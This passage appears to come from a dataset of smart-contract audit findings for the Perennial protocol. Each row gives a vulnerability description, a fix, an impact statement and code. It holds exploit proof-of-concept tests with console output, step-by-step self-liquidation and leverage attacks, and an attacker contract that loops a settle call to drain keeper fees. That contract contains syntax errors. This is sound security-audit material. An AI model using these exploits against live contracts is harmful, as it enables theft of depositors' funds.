(context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are 
skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). 
`closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent 
= await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(""Before liquidation. Latest= "" + posLatest.long + "" current = "" + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(""After liquidation. Latest= "" + posLatest.long + "" current = "" + posCurrent.long);\\n\\n})\\n```\\n","When liquidating, order must decrease position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\n","Malicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. 
For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.","```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n" +Vault leverage can be increased to any value up to min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`,high,"When redeeming from the vault, maximum amount allowed to be redeemed is limited by collateral required to keep the minimum vault position size which will remain open due to different factors, including `closable` 
value, which is a limitation on how much position can be closed given current pending positions. However, when calclulating max redeemable amount, `closable` value is multiplied by `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow to withdraw a bit more collateral so that leverage can increase at max by LEVERAGE_BUFFER. However, the math is totally wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so position will remain at 12-10 = 2\\nOnce settled, user can claim all vault collateral while vault still has position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if remaining collateral is equal to or is greater than total margin of all markets. This means that user can put the vault into max leverage possible ignoring the vault leverage config (vault will have open position of such size, which will make all vault collateral equal the minimum margin requirement to open such position). 
This creates a big risk for vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if user redeems amount higher than `closable` allows (redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such situation (redeemable amount > closable). There is still a way to create such situation indirectly via maker limit limitation.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in underlying market are worth $4K\\nOpen maker position in underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open position of size = $48K (+$44K), however `makerLimit` will not allow to open full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose maker position in underlying markets to free up maker limit\\nDeposit minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible, because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position will be limited by `closable`, so it will be reduced only by $40K (set to $8K).\\nWait until redeem settles\\nClaim $11K from the vault. 
This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log(""start"");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = 
(await market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log(""Vault collateral = "" + vaultCollateral.div(1e6) + "" pos = "" + vaultPos.div(1e12) + "" leverage = "" + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(""ETH Limit = "" + makerLimit + "" CurrentGlobal = "" + makerCurrent + "" CurrentUser = "" + makerBefore + "" price = "" + ethPrice + "" availToken = "" + availToken + "" maker = "" + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = 
parse6decimal('8000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(""BTC Limit = "" + makerLimit + "" CurrentGlobal = "" + makerCurrent + "" CurrentUser = "" + makerBeforeBtc + "" price = "" + btcPrice + "" availToken = "" + availToken + "" maker = "" + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log(""market updated"");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log(""reduce maker blocking position to allow vault maker increase"")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log(""Deposit small amount to increase position"")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log(""Redeeming 11500"")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n 
console.log(""Claiming 11100"")\\n await vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\n","The formula to allow LEVERAGE_BUFFER should apply it to final position size, not to delta position size (maxRedeem returns delta to subtract from current position). Currently redeem amount it limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense, it certainly doesn't limit new leverage factor to LEVERAGE_BUFFER (denominator can be 0, negative or any small value, meaning leverage can be any number as high as you want). 
I think what developers wanted, is to have:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate delta collateral simply from delta position like it is now. When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\n","Malicious user can put the vault at very high leverage, breaking important protocol invariant (leverage not exceeding target market leverage) and exposing the users to much higher potential funds loss / risk from the price movement due to high leverage and very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.","```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n 
.sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n" +Vault max redeem calculations limit redeem amount to the smallest position size in underlying markets which can lead to very small max redeem amount even with huge TVL vault,high,"When redeeming from the vault, maximum amount allowed to be redeemed is limited by current opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to maker limit, the vault will open very small position, limited by maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) position in such market, so there is no sense in limiting redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. 
For example, if the user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nVault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. As can be seen from the calculation, redeem amount is limited by vault's position in the market. However, if the position is far from target due to different market limitations, this doesn't make much sense. For example, if vault has $2M deposts and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 vault position is worth $1 (target position = $1M)\\nIn Market2 vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase position in Market1 rather than decrease.\\nThere is also an opposite situation possible, when current position is higher than target position (due to LEVERAGE_BUFFER). This will make maxredeem too high. 
For example, similar example to previous, but:\\nIn Market1 vault position is worth $1.2M (target position = $1M)\\nIn Market2 vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.","Consider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral instead of using only current position for calculations. This might be somewhat complex, because it will require to re-calculate allocation amounts to compare target vs current position. Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end)","When vault's position is small in any underlying market due to maker limit, the max redeem amount in the vault will be very small, which will force users with large deposits to use a lot of transactions to redeem it (they'll lose funds to gas) or it might even be next to impossible to do at all (if, for example, user has a deposit of $10M and max redeem = $1), in such case the redeems are basically broken and not possible to do.","```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n" +Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper fees,high,"Anyone can call `KeeperFactory#request`, inputting empty arrays as parameters, and the call will succeed, and the 
caller receives a fee.\\nAttacker can perform this attack many times within a loop to steal ALL keeper fees from protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper(i.e. caller) a fee.\\n`KeeperFactory#settle` call will fail if there is no account to settle(i.e. if callback array is empty)\\nAfter settleing an account, it gets removed from the callback array\\nThe issue:\\nHere is KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, """")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, function does not check if the length of the array is 0, so if user inputs empty array, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAttacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket(\\n function update()external;\\n)\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public 
keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,""not allowed"");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids=[];\\n IMarket[] memory markets=[];\\n uint256[] versions=[];\\n uint256[] maxCounts=[];\\n\\n // perform attack in a loop till all funds are drained or call reverts\\n while(canSteal){\\n try IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\n","Within KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, """") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n","All keeper fees can be stolen from protocol, and there will be no way to incentivize Keepers to commitRequested oracle version, and other keeper tasks","```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, """")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // 
Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n" +MultiInvoker doesn't pay keepers refund for l1 calldata,medium,"MultiInvoker doesn't pay keepers refund for l1 calldata, as result keepers can be not incentivized to execute orders.\\nMultiInvoker contract allows users to create orders, which then can be executed by keepers. For his job, keeper receives fee from order's creator. This fee payment is handled by `_handleKeep` function.\\nThe function will call `keep` modifier and will craft `KeepConfig` which contains `keepBufferCalldata`, which is flat fee for l1 calldata of this call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier should calculate amount of tokens that should be refunded to user and then raise it. We are interested not in whole modifier, but in calldata handling. To do that we call `_calldataFee` function. 
This function does nothing in the `Kept` contract and is overridden in the `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that there is only one MultiInvoker and it just extends `Kept`. As a result, its `_calldataFee` function will always return 0, which means that calldata fee will not be added to the refund of keeper.",You need to implement 2 versions of MultiInvoker: for optimism(Kept_Optimism) and arbitrum(Kept_Arbitrum).,Keeper will not be incentivized to execute orders.,"```\\n    modifier keep(\\n        KeepConfig memory config,\\n        bytes calldata applicableCalldata,\\n        uint256 applicableValue,\\n        bytes memory data\\n    ) {\\n        uint256 startGas = gasleft();\\n\\n\\n        _;\\n\\n\\n        uint256 applicableGas = startGas - gasleft();\\n        (UFixed18 baseFee, UFixed18 calldataFee) = (\\n            _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n            _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n        );\\n\\n\\n        UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n        _raiseKeeperFee(keeperFee, data);\\n        keeperToken().push(msg.sender, keeperFee);\\n\\n\\n        emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n    }\\n```\\n"
+It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost,medium,"In 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. 
So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Reduce your position by `(margin / maintenance)` and make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount. Position reduction makes margined(current position) = maintained(settled position), so it's possible to withdraw up to be at the edge of liquidation. 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. 
Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).","If collateral is withdrawn or order increases position, verify `maxPendingMagnitude` with `margined` amount. If position is reduced or remains unchanged AND collateral is not withdrawn, only then `maxPendingMagnitude` can be verified with `maintained` amount.","There are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine with the other issues for more severe effect to be able to abuse them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing to max position size of 2^62-1 - all in 1 transaction)\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). 
